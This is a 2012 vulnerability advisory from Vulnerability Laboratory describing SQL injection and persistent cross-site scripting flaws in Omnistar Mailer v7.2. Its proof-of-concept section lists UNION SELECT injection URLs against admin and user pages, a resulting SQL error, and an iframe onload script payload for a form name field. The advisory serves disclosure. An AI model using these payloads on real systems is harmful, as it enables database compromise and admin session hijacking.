222 lines
No EOL
8.9 KiB
Text
222 lines
No EOL
8.9 KiB
Text
Title:
|
||
======
|
||
Omnistar Mailer v7.2 - Multiple Web Vulnerabilities
|
||
|
||
|
||
Date:
|
||
=====
|
||
2012-10-01
|
||
|
||
|
||
References:
|
||
===========
|
||
http://www.vulnerability-lab.com/get_content.php?id=711
|
||
|
||
|
||
VL-ID:
|
||
=====
|
||
711
|
||
|
||
|
||
Common Vulnerability Scoring System:
|
||
====================================
|
||
8.5
|
||
|
||
|
||
Introduction:
|
||
=============
|
||
The Omnistar Mailer software was developed because of the need that was found in the industry to easily manage
|
||
email marketing campaigns without having much technical experience. After reviewing feedback from various users
|
||
that had used email mailing list managers, it was determined that many of the current solutions that are on the
|
||
market are cumbersome and overly complex. Most users of email marketing solutions desire a simple solution were
|
||
they can easily add email list campaigns and track the success of them. There of course are many other features
|
||
that add value to the products, however the main function is to send out mass emails, manage the opt-in /
|
||
opt-out process. After reviewing the feedback of these users and studying the current solutions on the market,
|
||
we developed what we call Omnistar Mailer. We feel our product combines simplicity with a robust set of features
|
||
and functions that should meet the needs of most users.
|
||
|
||
The Omnistar Mailer software is one of the flag ship solutions from Omnistar Interactive. Our entire goal when
|
||
developing any of our solutions has been to make it so easy to use, that any non-technical person can successfully
|
||
use the software. Everyday we strive to make more and more improvements to the software so that it becomes better
|
||
and better. To make this goal a reality, we actively solicit feedback from our customers so that we stay on the
|
||
pulse of their needs. It is only through this interactive dialogue that we can implement those features that make
|
||
sense to our customers. It is our customers that drive our development process and make sure that our software has
|
||
the most desired components and features.
|
||
|
||
(Copy of the Vendor Homepage: http://www.omnistarmailer.com/company.htm )
|
||
|
||
|
||
Abstract:
|
||
=========
|
||
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Omnistar Mailer v7.2 Email Marketing Software.
|
||
|
||
|
||
Report-Timeline:
|
||
================
|
||
2012-10-01: Public or Non-Public Disclosure
|
||
|
||
|
||
Status:
|
||
========
|
||
Published
|
||
|
||
|
||
Affected Products:
|
||
==================
|
||
Omnistar Interactive
|
||
Product: Omnistar Mailer v7.2
|
||
|
||
|
||
Exploitation-Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity:
|
||
=========
|
||
Critical
|
||
|
||
|
||
Details:
|
||
========
|
||
1.1
|
||
Multiple SQL Injection vulnerabilities are detected in the Omnistar Mailer v7.2 Email Marketing Software.
|
||
The vulnerabilities allow an attacker (remote) or local low privileged user account to execute a SQL commands on the
|
||
affected application dbms. The vulnerabilities are located in the responder, preview, pages, navlinks, contacts,
|
||
register and index modules with the bound vulnerable id & form_id parameters. Successful exploitation of the vulnerability
|
||
results in dbms & application compromise. Exploitation requires no user inter action & without privileged user account.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] /admin/responder
|
||
[+] /admin/preview
|
||
[+] /admin/navlinks
|
||
[+] /admin/pages
|
||
[+] /admin/contacts
|
||
[+] /users/index
|
||
[+] /users/register
|
||
|
||
Vulnerable File(s):
|
||
[+] /admin/responder.php
|
||
[+] /admin/preview.php
|
||
[+] /admin/pages.php
|
||
[+] /admin/navlinks.php
|
||
[+] /admin/contacts.php
|
||
[+] /user/register.php
|
||
[+] /users/index.php
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] ?op=edit&id=
|
||
[+] ?id=
|
||
[+] ?form_id=
|
||
[+] ?op=edit&nav_id=
|
||
[+] ?op=edit&id=16&form_id=
|
||
[+] ?op=edit&id=3&form_id=
|
||
|
||
[+] ?nav_id=
|
||
[+] ?profile=1&form_id=
|
||
[+] ?form_id=
|
||
|
||
|
||
1.2
|
||
A persistent input validation vulnerability is detected in the Omnistar Mailer v7.2 Email Marketing Software.
|
||
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
|
||
The persistent vulnerability is located in the Create Website Forms module with the bound vulnerable form name parameters.
|
||
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
|
||
Exploitation requires low user inter action & privileged user account.
|
||
|
||
Vulnerable Section(s):
|
||
[+] Customise Interface -> Create Website Forms
|
||
|
||
Vulnerable Module(s):
|
||
[+] Create Standard Registration Form -> Add form
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] Form Name
|
||
|
||
|
||
Proof of Concept:
|
||
=================
|
||
1.1
|
||
The SQL injection vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ...
|
||
|
||
PoC:
|
||
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
|
||
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
|
||
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
|
||
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#
|
||
|
||
http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
|
||
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
|
||
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
|
||
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
|
||
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'
|
||
|
||
--- SQL Exception ---
|
||
SQL error (You have an error in your SQL syntax;
|
||
check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3)
|
||
in (
|
||
select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
|
||
from mailer75_navlinks
|
||
where nav_id='9''
|
||
)
|
||
|
||
|
||
|
||
1.2
|
||
The persistent input validation vulnerability can be exploited by remote attackers with low required user inter action & low
|
||
privileged user account. For demonstration or reproduce ...
|
||
|
||
The attacker create a form and insert in "form name" field own malicious javascript or html code.
|
||
To create the form the attacker should to go to
|
||
Customise Interface -> Create Website Forms -> Create Standard Registration Form -> Add form
|
||
Then inject the malicious script code i.e., <iframe src=www.vuln-lab.com onload=alert("VL")/>
|
||
When the user browses the forms page in the control panel, or any user trying to register for the website,
|
||
the persistent injected script code will be executed out of the web application context.
|
||
|
||
|
||
Risk:
|
||
=====
|
||
1.1
|
||
The security risk of the blind SQL injection vulnerability is estimated as critical.
|
||
|
||
1.2
|
||
The security risk of the persistent input validation vulnerability is estimated as medium(+).
|
||
|
||
|
||
|
||
Credits:
|
||
========
|
||
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [storm@vulnerability-lab.com] [iel-sayed.blogspot.com]
|
||
|
||
|
||
Disclaimer:
|
||
===========
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||
or trade with fraud/stolen material.
|
||
|
||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
||
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
||
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||
|
||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
||
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
||
|
||
Copyright <20> 2012 | Vulnerability Laboratory
|
||
|
||
|
||
|
||
--
|
||
VULNERABILITY RESEARCH LABORATORY
|
||
LABORATORY RESEARCH TEAM
|
||
CONTACT: research@vulnerability-lab.com |